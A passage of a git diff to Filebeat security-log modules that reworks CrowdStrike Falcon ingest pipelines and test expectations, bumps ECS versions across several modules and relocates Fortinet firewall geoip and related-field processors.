crowdstrike.event.StartTimestamp + target_field: crowdstrike.event.StartTimestamp + timezone: UTC + formats: + - UNIX + ignore_failure: true + if: | + ctx?.crowdstrike?.event?.StartTimestamp != null && + !(ctx.crowdstrike.event.StartTimestamp instanceof String) && + ctx.crowdstrike.event.StartTimestamp != 0 && + (int)(Math.log10(ctx.crowdstrike.event.StartTimestamp) + 1) < 12 + - date: + field: crowdstrike.event.EndTimestamp + target_field: crowdstrike.event.EndTimestamp + timezone: UTC + formats: + - UNIX + ignore_failure: true + if: | + ctx?.crowdstrike?.event?.EndTimestamp != null && + !(ctx.crowdstrike.event.EndTimestamp instanceof String) && + ctx.crowdstrike.event.EndTimestamp != 0 && + (int)(Math.log10(ctx.crowdstrike.event.EndTimestamp) + 1) < 12 + - date: + field: crowdstrike.event.UTCTimestamp + target_field: crowdstrike.event.UTCTimestamp + timezone: UTC + formats: + - UNIX + ignore_failure: true + if: | + ctx?.crowdstrike?.event?.UTCTimestamp != null && + !(ctx.crowdstrike.event.UTCTimestamp instanceof String) && + ctx.crowdstrike.event.UTCTimestamp != 0 && + (int)(Math.log10(ctx.crowdstrike.event.UTCTimestamp) + 1) < 12 + - date: + field: crowdstrike.metadata.eventCreationTime + target_field: crowdstrike.metadata.eventCreationTime + timezone: UTC + formats: + - UNIX + ignore_failure: true + if: | + ctx?.crowdstrike?.metadata?.eventCreationTime != null && + !(ctx.crowdstrike.metadata.eventCreationTime instanceof String) && + ctx.crowdstrike.metadata.eventCreationTime != 0 && + (int)(Math.log10(ctx.crowdstrike.metadata.eventCreationTime) + 1) < 12 + - set: + field: event.outcome + value: success + if: ctx?.crowdstrike?.event?.Success == true + - set: + field: event.outcome + value: failure + if: ctx?.crowdstrike?.event?.Success == false + - set: + field: event.outcome + value: unknown + if: ctx?.event?.outcome == null + - convert: + field: crowdstrike.metadata.eventCreationTime + target_field: "@timestamp" + type: string + ignore_missing: true + ignore_failure: true + - convert: + field: crowdstrike.event.LateralMovement + type: long + ignore_missing: true + ignore_failure: true + - convert: + field: crowdstrike.event.LocalPort + type: long + ignore_missing: true + ignore_failure: true + - convert: + field: crowdstrike.event.MatchCount + type: long + ignore_missing: true + ignore_failure: true + - convert: + field: crowdstrike.event.MatchCountSinceLastReport + type: long + ignore_missing: true + ignore_failure: true + - convert: + field: crowdstrike.event.PID + type: long + ignore_missing: true + ignore_failure: true + - convert: + field: crowdstrike.event.RemotePort + type: long + ignore_missing: true + ignore_failure: true + - convert: + field: source.port + type: long + ignore_missing: true + ignore_failure: true + - convert: + field: destination.port + type: long + ignore_missing: true + ignore_failure: true + - convert: + field: crowdstrike.event.UserName + target_field: user.name + type: string + ignore_missing: true + ignore_failure: true + - convert: + field: crowdstrike.event.UserId + target_field: user.name + type: string + ignore_missing: true + ignore_failure: true + if: ctx?.user?.name == null || ctx?.user?.name == "" + - set: + field: user.email + value: "{{user.name}}" + ignore_empty_value: true + ignore_failure: true + if: ctx?.user?.name != null && /@/.split(ctx.user.name).length == 2 + - script: + lang: painless + source: | + def commandLine = ctx?.crowdstrike?.event?.CommandLine; + if (commandLine != null) { + + commandLine = commandLine.trim(); + + if (commandLine != "") { + def args = Arrays.asList(/ /.split(commandLine)); + args.removeIf(arg -> arg == ""); + + ctx["process.command_line"] = commandLine; + ctx["process.args"] = args; + ctx["process.executable"] = args.get(0); + } + } + - pipeline: + name: '{< IngestPipeline "detection_summary" >}' + if: ctx?.crowdstrike?.metadata?.eventType == "DetectionSummaryEvent" + - pipeline: + name: '{< IngestPipeline "incident_summary" >}' + if: ctx?.crowdstrike?.metadata?.eventType == "IncidentSummaryEvent" + - pipeline: + name: '{< IngestPipeline "user_activity_audit" >}' + if: ctx?.crowdstrike?.metadata?.eventType == "UserActivityAuditEvent" + - pipeline: + name: '{< IngestPipeline "auth_activity_audit" >}' + if: ctx?.crowdstrike?.metadata?.eventType == "AuthActivityAuditEvent" + - pipeline: + name: '{< IngestPipeline "firewall_match" >}' + if: ctx?.crowdstrike?.metadata?.eventType == "FirewallMatchEvent" + - pipeline: + name: '{< IngestPipeline "remote_response_session_start" >}' + if: ctx?.crowdstrike?.metadata?.eventType == "RemoteResponseSessionStartEvent" + - pipeline: + name: '{< IngestPipeline "remote_response_session_end" >}' + if: ctx?.crowdstrike?.metadata?.eventType == "RemoteResponseSessionEndEvent" - script: lang: painless if: ctx?.crowdstrike?.event != null @@ -12,6 +319,8 @@ processors: - '' - '-' - 'N/A' + - 'NA' + - 0 source: | ctx.crowdstrike.event.entrySet().removeIf(entry -> params.values.contains(entry.getValue())); - script: @@ -23,8 +332,33 @@ processors: - '' - '-' - 'N/A' + - 'NA' source: | ctx.crowdstrike.metadata.entrySet().removeIf(entry -> params.values.contains(entry.getValue())); + - append: + field: related.user + value: "{{user.name}}" + allow_duplicates: false + ignore_failure: true + if: ctx?.user?.name != null && ctx?.user?.name != "" + - append: + field: related.ip + value: "{{source.ip}}" + ignore_failure: true + allow_duplicates: false + if: ctx?.source?.ip != null && ctx?.source?.ip != "" + - append: + field: related.ip + value: "{{destination.ip}}" + ignore_failure: true + allow_duplicates: false + if: ctx?.destination?.ip != null && ctx?.destination?.ip != "" + - append: + field: related.hosts + value: "{{host.name}}" + ignore_failure: true + allow_duplicates: false + if: ctx?.host?.name != null && ctx?.host?.name != "" on_failure: - set: field: error.message diff --git a/x-pack/filebeat/module/crowdstrike/falcon/ingest/remote_response_session_end.yml b/x-pack/filebeat/module/crowdstrike/falcon/ingest/remote_response_session_end.yml new file mode 100644 index 000000000000..4e3b7b834a97 --- /dev/null +++ b/x-pack/filebeat/module/crowdstrike/falcon/ingest/remote_response_session_end.yml @@ -0,0 +1,25 @@ +processors: + - set: + field: event.kind + value: event + - append: + field: event.category + value: [network] + - append: + field: event.action + value: [remote_response_session_end_event] + - append: + field: event.type + value: [end, session] + - set: + field: event.dataset + value: crowdstrike.falcon_audit + - set: + field: message + value: Remote response session ended. + - convert: + field: crowdstrike.event.HostnameField + target_field: host.name + type: string + ignore_failure: true + ignore_missing: true diff --git a/x-pack/filebeat/module/crowdstrike/falcon/ingest/remote_response_session_start.yml b/x-pack/filebeat/module/crowdstrike/falcon/ingest/remote_response_session_start.yml new file mode 100644 index 000000000000..834a3dee73d6 --- /dev/null +++ b/x-pack/filebeat/module/crowdstrike/falcon/ingest/remote_response_session_start.yml @@ -0,0 +1,25 @@ +processors: + - set: + field: event.kind + value: event + - append: + field: event.category + value: [network] + - append: + field: event.action + value: [remote_response_session_start_event] + - append: + field: event.type + value: [start, session] + - set: + field: event.dataset + value: crowdstrike.falcon_audit + - set: + field: message + value: Remote response session started. + - convert: + field: crowdstrike.event.HostnameField + target_field: host.name + type: string + ignore_failure: true + ignore_missing: true diff --git a/x-pack/filebeat/module/crowdstrike/falcon/ingest/user_activity_audit.yml b/x-pack/filebeat/module/crowdstrike/falcon/ingest/user_activity_audit.yml new file mode 100644 index 000000000000..6998062561d0 --- /dev/null +++ b/x-pack/filebeat/module/crowdstrike/falcon/ingest/user_activity_audit.yml @@ -0,0 +1,29 @@ +processors: + - set: + field: event.kind + value: event + - append: + field: event.category + value: [iam] + - append: + field: event.type + value: [change] + - set: + field: event.dataset + value: crowdstrike.falcon_audit + - set: + field: event.action + value: user_activity_audit_event + - convert: + field: crowdstrike.event.OperationName + target_field: message + type: string + ignore_failure: true + ignore_missing: true + - convert: + field: crowdstrike.event.UserIp + target_field: source.ip + type: string + ignore_failure: true + ignore_missing: true + if: ctx?.crowdstrike?.event?.UserIp != null && ctx?.crowdstrike?.event?.UserIp != "" diff --git a/x-pack/filebeat/module/crowdstrike/falcon/manifest.yml b/x-pack/filebeat/module/crowdstrike/falcon/manifest.yml index 905124a0eaba..d4f04b84f114 100644 --- a/x-pack/filebeat/module/crowdstrike/falcon/manifest.yml +++ b/x-pack/filebeat/module/crowdstrike/falcon/manifest.yml @@ -8,4 +8,13 @@ var: default: [forwarded] input: config/falcon.yml -ingest_pipeline: ingest/pipeline.yml + +ingest_pipeline: + - ingest/pipeline.yml + - ingest/auth_activity_audit.yml + - ingest/detection_summary.yml + - ingest/firewall_match.yml + - ingest/incident_summary.yml + - ingest/remote_response_session_end.yml + - ingest/remote_response_session_start.yml + - ingest/user_activity_audit.yml diff --git a/x-pack/filebeat/module/crowdstrike/falcon/test/falcon-audit-events.log-expected.json b/x-pack/filebeat/module/crowdstrike/falcon/test/falcon-audit-events.log-expected.json index 4d21948cac77..690cb98ed095 100644 --- a/x-pack/filebeat/module/crowdstrike/falcon/test/falcon-audit-events.log-expected.json +++ b/x-pack/filebeat/module/crowdstrike/falcon/test/falcon-audit-events.log-expected.json @@ -9,13 +9,19 @@ "crowdstrike.metadata.eventType": "RemoteResponseSessionStartEvent", "crowdstrike.metadata.offset": 1045, "crowdstrike.metadata.version": "1.0", - "event.action": "remote_response_session_start_event", + "event.action": [ + "remote_response_session_start_event" + ], + "event.category": [ + "network" + ], "event.dataset": "crowdstrike.falcon_audit", "event.kind": "event", "event.module": "crowdstrike", "event.outcome": "unknown", "event.type": [ - "start" + "start", + "session" ], "fileset.name": "falcon", "host.name": "hostnameofmachine", @@ -24,8 +30,13 @@ "multiline" ], "log.offset": 0, - "message": "Remote response session started", - "related.user": "first.last@company.com", + "message": "Remote response session started.", + "related.hosts": [ + "hostnameofmachine" + ], + "related.user": [ + "first.last@company.com" + ], "service.type": "crowdstrike", "tags": [ "forwarded" @@ -43,13 +54,19 @@ "crowdstrike.metadata.eventType": "RemoteResponseSessionEndEvent", "crowdstrike.metadata.offset": 1046, "crowdstrike.metadata.version": "1.0", - "event.action": "remote_response_session_end_event", + "event.action": [ + "remote_response_session_end_event" + ], + "event.category": [ + "network" + ], "event.dataset": "crowdstrike.falcon_audit", "event.kind": "event", "event.module": "crowdstrike", "event.outcome": "unknown", "event.type": [ - "end" + "end", + "session" ], "fileset.name": "falcon", "host.name": "hostnameofmachine", @@ -58,8 +75,13 @@ "multiline" ], "log.offset": 457, - "message": "Remote response session ended", - "related.user": "first.last@company.com", + "message": "Remote response session ended.", + "related.hosts": [ + "hostnameofmachine" + ], + "related.user": [ + "first.last@company.com" + ], "service.type": "crowdstrike", "tags": [ "forwarded" @@ -119,8 +141,12 @@ ], "log.offset": 910, "message": "Crowdstrike Streaming API", - "related.ip": "10.10.0.8", - "related.user": "api-client-id:1234567890abcdefghijklmnopqrstuvwxyz", + "related.ip": [ + "10.10.0.8" + ], + "related.user": [ + "api-client-id:1234567890abcdefghijklmnopqrstuvwxyz" + ], "service.type": "crowdstrike", "source.ip": "10.10.0.8", "tags": [ @@ -158,8 +184,12 @@ ], "log.offset": 2152, "message": "CrowdStrike Authentication", - "related.ip": "192.168.6.8", - "related.user": "alice@company.com", + "related.ip": [ + "192.168.6.8" + ], + "related.user": [ + "alice@company.com" + ], "service.type": "crowdstrike", "source.ip": "192.168.6.8", "tags": [ @@ -198,8 +228,12 @@ ], "log.offset": 2645, "message": "CrowdStrike Authentication", - "related.ip": "192.168.6.3", - "related.user": "bob@company.com", + "related.ip": [ + "192.168.6.3" + ], + "related.user": [ + "bob@company.com" + ], "service.type": "crowdstrike", "source.ip": "192.168.6.3", "tags": [ @@ -247,8 +281,12 @@ ], "log.offset": 3136, "message": "update_group", - "related.ip": "192.168.6.13", - "related.user": "chris@company.com", + "related.ip": [ + "192.168.6.13" + ], + "related.user": [ + "chris@company.com" + ], "service.type": "crowdstrike", "source.ip": "192.168.6.13", "tags": [ @@ -293,8 +331,12 @@ ], "log.offset": 3858, "message": "CrowdStrike Authentication", - "related.ip": "192.168.6.8", - "related.user": "alice@company.com", + "related.ip": [ + "192.168.6.8" + ], + "related.user": [ + "alice@company.com" + ], "service.type": "crowdstrike", "source.ip": "192.168.6.8", "tags": [ @@ -333,8 +375,12 @@ ], "log.offset": 4506, "message": "CrowdStrike Authentication", - "related.ip": "192.168.6.8", - "related.user": "alice@company.com", + "related.ip": [ + "192.168.6.8" + ], + "related.user": [ + "alice@company.com" + ], "service.type": "crowdstrike", "source.ip": "192.168.6.8", "tags": [ @@ -379,8 +425,12 @@ ], "log.offset": 4999, "message": "CrowdStrike Authentication", - "related.ip": "192.168.6.8", - "related.user": "alice@company.com", + "related.ip": [ + "192.168.6.8" + ], + "related.user": [ + "alice@company.com" + ], "service.type": "crowdstrike", "source.ip": "192.168.6.8", "tags": [ @@ -419,8 +469,12 @@ ], "log.offset": 5646, "message": "CrowdStrike Authentication", - "related.ip": "192.168.6.8", - "related.user": "alice@company.com", + "related.ip": [ + "192.168.6.8" + ], + "related.user": [ + "alice@company.com" + ], "service.type": "crowdstrike", "source.ip": "192.168.6.8", "tags": [ @@ -459,8 +513,12 @@ ], "log.offset": 6134, "message": "CrowdStrike Authentication", - "related.ip": "192.168.6.8", - "related.user": "alice@company.com", + "related.ip": [ + "192.168.6.8" + ], + "related.user": [ + "alice@company.com" + ], "service.type": "crowdstrike", "source.ip": "192.168.6.8", "tags": [ @@ -499,8 +557,12 @@ ], "log.offset": 6627, "message": "CrowdStrike Authentication", - "related.ip": "192.168.6.8", - "related.user": "alice@company.com", + "related.ip": [ + "192.168.6.8" + ], + "related.user": [ + "alice@company.com" + ], "service.type": "crowdstrike", "source.ip": "192.168.6.8", "tags": [ @@ -556,8 +618,12 @@ ], "log.offset": 7113, "message": "detection_update", - "related.ip": "192.168.6.8", - "related.user": "alice@company.com", + "related.ip": [ + "192.168.6.8" + ], + "related.user": [ + "alice@company.com" + ], "service.type": "crowdstrike", "source.ip": "192.168.6.8", "tags": [ diff --git a/x-pack/filebeat/module/crowdstrike/falcon/test/falcon-events.log-expected.json b/x-pack/filebeat/module/crowdstrike/falcon/test/falcon-events.log-expected.json index eab6fb1db0eb..0756dfac4772 100644 --- a/x-pack/filebeat/module/crowdstrike/falcon/test/falcon-events.log-expected.json +++ b/x-pack/filebeat/module/crowdstrike/falcon/test/falcon-events.log-expected.json @@ -73,7 +73,19 @@ "process.executable": "C:\\Windows\\Explorer.EXE", "process.name": "explorer.exe", "process.pid": 38684386611, - "related.ip": "192.168.12.51", + "related.hash": [ + "6a671b92a69755de6fd063fcbe4ba926d83b49f78c42dbaeed8cdb6bbc57576a", + "ac4c51eb24aa95b77f705ab159189e24" + ], + "related.hosts": [ + "alice-laptop" + ], + "related.ip": [ + "192.168.12.51" + ], + "related.user": [ + "alice" + ], "rule.description": "Terminated a process related to the deletion of backups, which is often indicative of ransomware activity.", "rule.name": "Process Terminated", "service.type": "crowdstrike", @@ -159,7 +171,9 @@ ], "log.offset": 2579, "message": "quarantined_file_update", - "related.user": "Crowdstrike", + "related.user": [ + "Crowdstrike" + ], "service.type": "crowdstrike", "tags": [ "forwarded" diff --git a/x-pack/filebeat/module/crowdstrike/falcon/test/falcon-sample.log-expected.json b/x-pack/filebeat/module/crowdstrike/falcon/test/falcon-sample.log-expected.json index becdbecc7c8c..dd277a3f2c9f 100644 --- a/x-pack/filebeat/module/crowdstrike/falcon/test/falcon-sample.log-expected.json +++ b/x-pack/filebeat/module/crowdstrike/falcon/test/falcon-sample.log-expected.json @@ -33,7 +33,9 @@ "crowdstrike.metadata.version": "1.0", "destination.ip": "10.37.60.194", "destination.port": 445, - "event.action": "firewall_match_event", + "event.action": [ + "firewall_match_event" + ], "event.category": [ "network" ], @@ -41,9 +43,7 @@ "event.dataset": "crowdstrike.falcon_endpoint", "event.kind": "event", "event.module": "crowdstrike", - "event.outcome": [ - "unknown" - ], + "event.outcome": "unknown", "event.type": [ "start", "connection" @@ -59,6 +59,9 @@ "network.direction": "ingress", "network.type": "ipv4", "process.pid": 206158879910, + "related.hosts": [ + "TESTDEVICE01" + ], "related.ip": [ "10.37.60.21", "10.37.60.194" @@ -163,8 +166,12 @@ ], "log.offset": 2041, "message": "Crowdstrike Authentication", - "related.ip": "165.225.220.184", - "related.user": "first.last@company.com", + "related.ip": [ + "165.225.220.184" + ], + "related.user": [ + "first.last@company.com" + ], "service.type": "crowdstrike", "source.ip": "165.225.220.184", "tags": [ @@ -211,7 +218,9 @@ ], "log.offset": 3219, "message": "quarantined_file_update", - "related.user": "Crowdstrike", + "related.user": [ + "Crowdstrike" + ], "service.type": "crowdstrike", "tags": [ "forwarded" @@ -228,13 +237,19 @@ "crowdstrike.metadata.eventType": "RemoteResponseSessionStartEvent", "crowdstrike.metadata.offset": 57217, "crowdstrike.metadata.version": "1.0", - "event.action": "remote_response_session_start_event", + "event.action": [ + "remote_response_session_start_event" + ], + "event.category": [ + "network" + ], "event.dataset": "crowdstrike.falcon_audit", "event.kind": "event", "event.module": "crowdstrike", "event.outcome": "unknown", "event.type": [ - "start" + "start", + "session" ], "fileset.name": "falcon", "host.name": "TESTDEVICE01", @@ -243,8 +258,13 @@ "multiline" ], "log.offset": 4017, - "message": "Remote response session started", - "related.user": "first.last@company.com", + "message": "Remote response session started.", + "related.hosts": [ + "TESTDEVICE01" + ], + "related.user": [ + "first.last@company.com" + ], "service.type": "crowdstrike", "tags": [ "forwarded" @@ -273,13 +293,19 @@ "crowdstrike.metadata.eventType": "RemoteResponseSessionEndEvent", "crowdstrike.metadata.offset": 57269, "crowdstrike.metadata.version": "1.0", - "event.action": "remote_response_session_end_event", + "event.action": [ + "remote_response_session_end_event" + ], + "event.category": [ + "network" + ], "event.dataset": "crowdstrike.falcon_audit", "event.kind": "event", "event.module": "crowdstrike", "event.outcome": "unknown", "event.type": [ - "end" + "end", + "session" ], "fileset.name": "falcon", "host.name": "TESTDEVICE01", @@ -288,8 +314,13 @@ "multiline" ], "log.offset": 4466, - "message": "Remote response session ended", - "related.user": "first.last@company.com", + "message": "Remote response session ended.", + "related.hosts": [ + "TESTDEVICE01" + ], + "related.user": [ + "first.last@company.com" + ], "service.type": "crowdstrike", "tags": [ "forwarded" @@ -335,7 +366,6 @@ "crowdstrike.event.LocalIP": "10.1.190.117", "crowdstrike.event.MACAddress": "54-ad-d4-d2-a8-0b", "crowdstrike.event.MD5String": "0ab1235adca04aef6239f5496ef0a5df", - "crowdstrike.event.MachineDomain": "NA", "crowdstrike.event.Objective": "Falcon Detection Method", "crowdstrike.event.ParentCommandLine": "C:\\Windows\\Explorer.EXE", "crowdstrike.event.ParentImageFileName": "\\Device\\HarddiskVolume2\\Windows\\explorer.exe", @@ -402,13 +432,25 @@ "process.args": [ "\"C:\\ProgramData\\file\\path\\filename.exe\"" ], - "process.command_line": "\"C:\\ProgramData\\file\\path\\filename.exe\" ", + "process.command_line": "\"C:\\ProgramData\\file\\path\\filename.exe\"", "process.executable": "\"C:\\ProgramData\\file\\path\\filename.exe\"", "process.name": "filename.exe", "process.parent.command_line": "C:\\Windows\\Explorer.EXE", "process.parent.executable": "\\Device\\HarddiskVolume2\\Windows\\explorer.exe", "process.pid": 663790158277, - "related.ip": "10.1.190.117", + "related.hash": [ + "0a123b185f9a32fde1df59897089014c92e3d08a0533b54baa72ba2a93d64deb", + "0ab1235adca04aef6239f5496ef0a5df" + ], + "related.hosts": [ + "TESTDEVICE01" + ], + "related.ip": [ + "10.1.190.117" + ], + "related.user": [ + "First.last" + ], "rule.description": "This file meets the machine learning-based on-sensor AV protection's low confidence threshold for malicious files.", "rule.name": "NGAV", "service.type": "crowdstrike", diff --git a/x-pack/filebeat/module/cyberark/corepas/config/input.yml b/x-pack/filebeat/module/cyberark/corepas/config/input.yml index caf07675b0f6..49b1e4ef20b0 100644 --- a/x-pack/filebeat/module/cyberark/corepas/config/input.yml +++ b/x-pack/filebeat/module/cyberark/corepas/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/cylance/protect/config/input.yml b/x-pack/filebeat/module/cylance/protect/config/input.yml index 7727cd2b81e7..9e7cfc5a0fdc 100644 --- a/x-pack/filebeat/module/cylance/protect/config/input.yml +++ b/x-pack/filebeat/module/cylance/protect/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/envoyproxy/log/config/envoyproxy.yml b/x-pack/filebeat/module/envoyproxy/log/config/envoyproxy.yml index 8c4509eb2270..162208f2e80a 100644 --- a/x-pack/filebeat/module/envoyproxy/log/config/envoyproxy.yml +++ b/x-pack/filebeat/module/envoyproxy/log/config/envoyproxy.yml @@ -9,4 +9,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/f5/bigipafm/config/input.yml b/x-pack/filebeat/module/f5/bigipafm/config/input.yml index 28e46f847ab7..9166fe8a62fc 100644 --- a/x-pack/filebeat/module/f5/bigipafm/config/input.yml +++ b/x-pack/filebeat/module/f5/bigipafm/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/f5/bigipapm/config/input.yml b/x-pack/filebeat/module/f5/bigipapm/config/input.yml index de1b11667744..9ca732182468 100644 --- a/x-pack/filebeat/module/f5/bigipapm/config/input.yml +++ b/x-pack/filebeat/module/f5/bigipapm/config/input.yml @@ -84,4 +84,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/fortinet/clientendpoint/config/input.yml b/x-pack/filebeat/module/fortinet/clientendpoint/config/input.yml index 94c4f9b163ea..833d5dae4a47 100644 --- a/x-pack/filebeat/module/fortinet/clientendpoint/config/input.yml +++ b/x-pack/filebeat/module/fortinet/clientendpoint/config/input.yml @@ -90,4 +90,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/fortinet/firewall/config/firewall.yml b/x-pack/filebeat/module/fortinet/firewall/config/firewall.yml index 033577a4ef4d..61f503d7f996 100644 --- a/x-pack/filebeat/module/fortinet/firewall/config/firewall.yml +++ b/x-pack/filebeat/module/fortinet/firewall/config/firewall.yml @@ -28,7 +28,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 {{ if .external_interfaces }} - add_fields: diff --git a/x-pack/filebeat/module/fortinet/firewall/ingest/event.yml b/x-pack/filebeat/module/fortinet/firewall/ingest/event.yml index 8278c538c262..4e299f4be086 100644 --- a/x-pack/filebeat/module/fortinet/firewall/ingest/event.yml +++ b/x-pack/filebeat/module/fortinet/firewall/ingest/event.yml @@ -242,93 +242,6 @@ processors: type: integer ignore_failure: true ignore_missing: true -- geoip: - field: source.ip - target_field: source.geo - ignore_missing: true - if: "ctx.source?.geo == null" -- geoip: - field: destination.ip - target_field: destination.geo - ignore_missing: true - if: "ctx.destination?.geo == null" -- geoip: - database_file: GeoLite2-ASN.mmdb - field: source.ip - target_field: source.as - properties: - - asn - - organization_name - ignore_missing: true -- geoip: - database_file: GeoLite2-ASN.mmdb - field: destination.ip - target_field: destination.as - properties: - - asn - - organization_name - ignore_missing: true -- geoip: - field: source.nat.ip - target_field: source.geo - ignore_missing: true - if: "ctx.source?.geo == null" -- geoip: - field: destination.nat.ip - target_field: destination.geo - ignore_missing: true - if: "ctx.destination?.geo == null" -- geoip: - database_file: GeoLite2-ASN.mmdb - field: source.nat.ip - target_field: source.as - properties: - - asn - - organization_name - ignore_missing: true - if: "ctx.source?.as == null" -- geoip: - database_file: GeoLite2-ASN.mmdb - field: destination.nat.ip - target_field: destination.as - properties: - - asn - - organization_name - ignore_missing: true - if: "ctx.destination?.as == null" -- rename: - field: source.as.asn - target_field: source.as.number - ignore_missing: true -- rename: - field: source.as.organization_name - target_field: source.as.organization.name - ignore_missing: true -- rename: - field: destination.as.asn - target_field: destination.as.number - ignore_missing: true -- rename: - field: destination.as.organization_name - target_field: destination.as.organization.name - ignore_missing: true -- script: - lang: painless - source: ctx.network.bytes = ctx.source.bytes + ctx.destination.bytes - if: "ctx?.source?.bytes != null && ctx?.destination?.bytes != null" - ignore_failure: true -- append: - field: related.ip - value: "{{source.ip}}" - if: "ctx.source?.ip != null" -- append: - field: related.ip - value: "{{destination.ip}}" - if: "ctx.destination?.ip != null" -- append: - field: related.user - value: "{{source.user.name}}" - if: "ctx.source?.user?.name != null" - remove: field: - fortinet.firewall.dstport diff --git a/x-pack/filebeat/module/fortinet/firewall/ingest/pipeline.yml b/x-pack/filebeat/module/fortinet/firewall/ingest/pipeline.yml index a227d7700829..c103fd147007 100644 --- a/x-pack/filebeat/module/fortinet/firewall/ingest/pipeline.yml +++ b/x-pack/filebeat/module/fortinet/firewall/ingest/pipeline.yml @@ -15,14 +15,17 @@ processors: ignore_missing: true ignore_failure: false trim_value: "\"" -- remove: - field: fortinet.tmp.assignip - if: "ctx.fortinet?.tmp?.assignip == 'N/A'" - ignore_missing: true - rename: field: fortinet.tmp target_field: fortinet.firewall ignore_missing: true +- script: + lang: painless + source: | + def fw = ctx?.fortinet?.firewall; + if (fw != null) { + fw.entrySet().removeIf(entry -> entry.getValue() == "N/A"); + } - set: field: observer.vendor value: Fortinet @@ -134,36 +137,6 @@ processors: field: fortinet.firewall.level target_field: log.level ignore_missing: true -- remove: - field: fortinet.firewall.assignip - if: "ctx.fortinet?.firewall?.assignip == 'N/A'" -- remove: - field: fortinet.firewall.dstip - if: "ctx.fortinet?.firewall?.dstip == 'N/A'" -- remove: - field: fortinet.firewall.srcip - if: "ctx.fortinet?.firewall?.srcip == 'N/A'" -- remove: - field: fortinet.firewall.remip - if: "ctx.fortinet?.firewall?.remip == 'N/A'" -- remove: - field: fortinet.firewall.locip - if: "ctx.fortinet?.firewall?.locip == 'N/A'" -- remove: - field: fortinet.firewall.group - if: "ctx.fortinet?.firewall?.group == 'N/A'" -- remove: - field: fortinet.firewall.user - if: "ctx.fortinet?.firewall?.user == 'N/A'" -- remove: - field: fortinet.firewall.tranip - if: "ctx.fortinet?.firewall?.tranip == 'N/A'" -- remove: - field: fortinet.firewall.transip - if: "ctx.fortinet?.firewall?.transip == 'N/A'" -- remove: - field: fortinet.firewall.tunnelip - if: "ctx.fortinet?.firewall?.tunnelip == 'N/A'" # Handle interface-based network directionality - set: field: network.direction @@ -259,6 +232,128 @@ processors: field: fortinet.firewall.size type: long ignore_missing: true +- geoip: + field: source.ip + target_field: source.geo + ignore_missing: true + if: "ctx.source?.geo == null" +- geoip: + field: destination.ip + target_field: destination.geo + ignore_missing: true + if: "ctx.destination?.geo == null" +- geoip: + database_file: GeoLite2-ASN.mmdb + field: source.ip + target_field: source.as + properties: + - asn + - organization_name + ignore_missing: true +- geoip: + database_file: GeoLite2-ASN.mmdb + field: destination.ip + target_field: destination.as + properties: + - asn + - organization_name + ignore_missing: true +- geoip: + field: source.nat.ip + target_field: source.geo + ignore_missing: true + if: "ctx.source?.geo == null" +- geoip: + field: destination.nat.ip + target_field: destination.geo + ignore_missing: true + if: "ctx.destination?.geo == null" +- geoip: + database_file: GeoLite2-ASN.mmdb + field: source.nat.ip + target_field: source.as + properties: + - asn + - organization_name + ignore_missing: true + if: "ctx.source?.as == null" +- geoip: + database_file: GeoLite2-ASN.mmdb + field: destination.nat.ip + target_field: destination.as + properties: + - asn + - organization_name + ignore_missing: true + if: "ctx.destination?.as == null" +- rename: + field: source.as.asn + target_field: source.as.number + ignore_missing: true +- rename: + field: source.as.organization_name + target_field: source.as.organization.name + ignore_missing: true +- rename: + field: destination.as.asn + target_field: destination.as.number + ignore_missing: true +- rename: + field: destination.as.organization_name + target_field: destination.as.organization.name + ignore_missing: true +- script: + lang: painless + source: "ctx.network.bytes = ctx.source.bytes + ctx.destination.bytes" + if: "ctx?.source?.bytes != null && ctx?.destination?.bytes != null" + ignore_failure: true +- script: + lang: painless + source: "ctx.network.packets = ctx.source.packets + ctx.destination.packets" + if: "ctx?.source?.packets != null && ctx?.destination?.packets != null" + ignore_failure: true +- append: + field: related.ip + value: "{{source.ip}}" + if: "ctx.source?.ip != null" +- append: + field: related.ip + value: "{{destination.ip}}" + if: "ctx.destination?.ip != null" +- append: + field: related.user + value: "{{source.user.name}}" + if: "ctx.source?.user?.name != null" +- append: + field: related.user + value: "{{destination.user.name}}" + if: "ctx.destination?.user?.name != null" +- append: + field: related.hosts + value: "{{destination.address}}" + if: "ctx.destination?.address != null" +- append: + field: related.hosts + value: "{{source.address}}" + if: "ctx.source?.address != null" +- append: + field: related.hosts + value: "{{dns.question.name}}" + if: "ctx.dns?.question?.name != null" +- script: + lang: painless + source: | + def dnsIPs = ctx?.dns?.resolved_ip; + if (dnsIPs != null && dnsIPs instanceof List) { + if (ctx?.related?.ip == null) { + ctx.related.ip = []; + } + for (ip in dnsIPs) { + if (!ctx.related.ip.contains(ip)) { + ctx.related.ip.add(ip); + } + } + } on_failure: - set: field: error.message diff --git a/x-pack/filebeat/module/fortinet/firewall/ingest/traffic.yml b/x-pack/filebeat/module/fortinet/firewall/ingest/traffic.yml index 051a3eca2f83..5166332e2a1c 100644 --- a/x-pack/filebeat/module/fortinet/firewall/ingest/traffic.yml +++ b/x-pack/filebeat/module/fortinet/firewall/ingest/traffic.yml @@ -200,102 +200,6 @@ processors: field: fortinet.firewall.url target_field: url.path ignore_missing: true -- geoip: - field: source.ip - target_field: source.geo - ignore_missing: true - if: "ctx.source?.geo == null" -- geoip: - field: destination.ip - target_field: destination.geo - ignore_missing: true - if: "ctx.destination?.geo == null" -- geoip: - database_file: GeoLite2-ASN.mmdb - field: source.ip - target_field: source.as - properties: - - asn - - organization_name - ignore_missing: true -- geoip: - database_file: GeoLite2-ASN.mmdb - field: destination.ip - target_field: destination.as - properties: - - asn - - organization_name - ignore_missing: true -- geoip: - field: source.nat.ip - target_field: source.geo - ignore_missing: true - if: "ctx.source?.geo 